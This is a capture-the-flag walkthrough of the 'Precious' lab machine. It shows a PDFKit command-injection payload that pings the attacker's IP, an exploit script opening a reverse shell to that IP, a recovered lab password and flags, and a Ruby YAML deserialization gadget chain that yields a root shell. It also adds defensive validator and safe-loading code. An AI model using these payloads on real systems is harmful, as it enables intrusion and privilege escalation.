Information Gathering
| IP Address | Open Ports |
|---|---|
| 10.10.11.189 | TCP: 22, 80 |
```bash
ip='10.10.11.189'; itf='tun0'
if nmap -sn "$ip" | grep -q "Host is up"; then
  echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
  ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" \
    | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
  if [ -n "$ports" ]; then
    echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
    nmap -Pn -sV -sC -p "$ports" "$ip"
  else
    echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
  fi
else
  echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
fi
```
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 845e13a8e31e20661d235550f63047d2 (RSA)
| 256 a2ef7b9665ce4161c467ee4e96c7c892 (ECDSA)
|_ 256 33053dcd7ab798458239e7ae3c91a658 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Ruby && PDFKit v0.8.6 RCE
# echo '10.10.11.189 precious.htb'>>/etc/hosts
$ whatweb http://precious.htb/ -v
http://10.10.16.28/target.txt
$ ./exiftool q6whs0fu6nzcp86yervxcasxcxqofm8k.pdf
Generated by pdfkit v0.8.6
PDFKit v0.8.6 is a tool for generating PDF documents, but it is not the JavaScript PDFKit; it is the Ruby PDFKit. It is built on the wkhtmltopdf backend and produces PDF documents from HTML and CSS. This version supports Ruby 2.5, 2.6, 2.7, 3.0 and 3.1.
https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
http%20`ping -c 1 10.10.16.28`
https://www.exploit-db.com/exploits/51293
$ python3 kit.py -s 10.10.16.28 443 -w http://precious.htb -p url
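The page shows the source URL being used to smuggle shell metacharacters through PDFKit into the wkhtmltopdf invocation. Besides upgrading the gem, the application-side defence is to never hand a raw user-supplied string to the PDF renderer: parse it, allow only absolute http(s) URLs, and reject any character a shell would interpret. The following validator is an added example written for this page; it is not code from the PDFKit project or from the box, and the sample URLs are constructed.

```ruby
require "uri"

# Constructed sample inputs (not taken from the target):
GOOD_URL   = "http://example.com/report?id=42&format=a4"
SHELL_URL  = "http%20`ping -c 1 127.0.0.1`"   # same shape as the page's payload
SCHEME_URL = "file:///etc/passwd"             # valid URI, wrong scheme

# Conservative allow-list: unreserved characters plus the delimiters a normal
# http(s) URL needs. It deliberately excludes space, backtick, $, ;, |, quotes
# and parentheses, i.e. the characters a shell would act on if the value ever
# reached a command line unescaped.
SAFE_URL_CHARS = /\A[A-Za-z0-9\-._~:\/?#\[\]@=&%+,]+\z/

# Returns the validated URL string, or raises ArgumentError.
def validated_pdf_source(input)
  raise ArgumentError, "disallowed characters in URL" unless input.match?(SAFE_URL_CHARS)
  uri = URI.parse(input)
  # URI::HTTPS inherits from URI::HTTP, so this accepts both schemes only.
  unless uri.is_a?(URI::HTTP) && uri.host && !uri.host.empty?
    raise ArgumentError, "only absolute http(s) URLs are accepted"
  end
  uri.to_s
rescue URI::InvalidURIError => e
  raise ArgumentError, "unparseable URL: #{e.message}"
end

# Boolean wrapper for call sites that only need accept/reject.
def pdf_source_allowed?(input)
  validated_pdf_source(input)
  true
rescue ArgumentError
  false
end

if __FILE__ == $0
  [GOOD_URL, SHELL_URL, SCHEME_URL].each do |u|
    puts "#{pdf_source_allowed?(u) ? 'accept' : 'reject'}: #{u}"
  end
end
```

The character check runs before `URI.parse` on purpose: the parser alone would reject the backtick payload here, but a URL-encoded or otherwise parser-tolerant variant might not, so the allow-list is the control and the scheme check is a second gate. Validation does not replace patching the gem; it limits what an unpatched renderer can ever be asked to fetch.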
Ruby to henry
ruby@precious:~$ grep -iR henry
username:henry
password:Q3c1AqGHtoI0aXAYFH
User.txt
5122df0943bba969f407138e7456440a
Privilege Escalation: Ruby YAML deserialization
henry@precious:~$ sudo -l
```ruby
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
  # Relative path plus unsafe YAML.load: the file is read from the current
  # working directory, and arbitrary Ruby objects may be instantiated.
  YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
  Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
  gems_local.each do |local_name, local_version|
    if(file_name == local_name)
      if(file_version != local_version)
        puts "Installed version differs from the one specified in file: " + local_name
      else
        puts "Installed version is equals to the one specified in file: " + local_name
      end
    end
  end
end
```
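The script above has two defects that combine into the privilege escalation: `YAML.load` on a Psych 3.x Ruby (Debian 11 ships Ruby 2.7) will instantiate any `!ruby/object:` tag it meets, and the relative path means the file is whatever `dependencies.yml` sits in the caller's working directory. The following hardened version of `list_from_file` is an added example for this page, not code from the box; it assumes a fixed path `/opt/dependencies.yml` and embeds two constructed YAML documents so it runs offline.

```ruby
require "yaml"

# Constructed sample inputs (not from the target machine):
# a benign dependency list and a document carrying a Ruby object tag.
BENIGN_YAML = <<~YAML
  ---
  rails: "7.0.4"
  nokogiri: "1.13.10"
YAML

TAGGED_YAML = <<~YAML
  ---
  - !ruby/object:Gem::Installer
    i: x
YAML

# Hardened replacement for list_from_file's parsing step: safe_load with no
# permitted classes and no aliases refuses every !ruby/* tag, and the result
# is additionally checked to be a Hash of gem-name => version-string.
def load_dependency_list(yaml_text)
  data = YAML.safe_load(yaml_text, permitted_classes: [], aliases: false)
  raise ArgumentError, "expected a mapping of gem => version" unless data.is_a?(Hash)
  data.each do |name, version|
    unless name.is_a?(String) && version.is_a?(String)
      raise ArgumentError, "invalid entry for #{name.inspect}"
    end
    unless name.match?(/\A[a-z0-9_\-.]+\z/i) && version.match?(/\A[0-9][0-9a-z.\-]*\z/i)
      raise ArgumentError, "malformed gem name or version: #{name} #{version}"
    end
  end
  data
end

# Absolute path (an assumption for this example) so that the working
# directory of the caller no longer selects which file gets parsed.
DEPENDENCIES_PATH = "/opt/dependencies.yml"

def list_from_file(path = DEPENDENCIES_PATH)
  load_dependency_list(File.read(path))
end

# Classifies a YAML document without instantiating anything:
# :ok when it is acceptable, :rejected when safe_load or the shape check refuses it.
def check_yaml(yaml_text)
  load_dependency_list(yaml_text)
  :ok
rescue Psych::Exception, ArgumentError
  :rejected
end

if __FILE__ == $0
  puts "benign: #{check_yaml(BENIGN_YAML)}"
  puts "tagged: #{check_yaml(TAGGED_YAML)}"
end
```

Two caveats worth knowing when reviewing similar scripts: on Psych 4 (Ruby 3.1 and later) `YAML.load` already behaves like `safe_load`, so the same source is exploitable or not depending on the interpreter it runs under, which is why the explicit `safe_load` call is preferable to relying on the default; and a file read from a directory the unprivileged user can write to remains a problem even with safe parsing, which is what the fixed path addresses.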
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure%20Deserialization/Ruby.md
Create a dependencies.yml file in another directory: because the Ruby program calls YAML.load(File.read("dependencies.yml")) with a relative path, it reads the dependencies.yml in whatever working directory it is run from.
```yaml
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: /bin/bash
         method_id: :resolve
```
henry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rb
Root.txt
822a67160b990d37b78c84fb03256922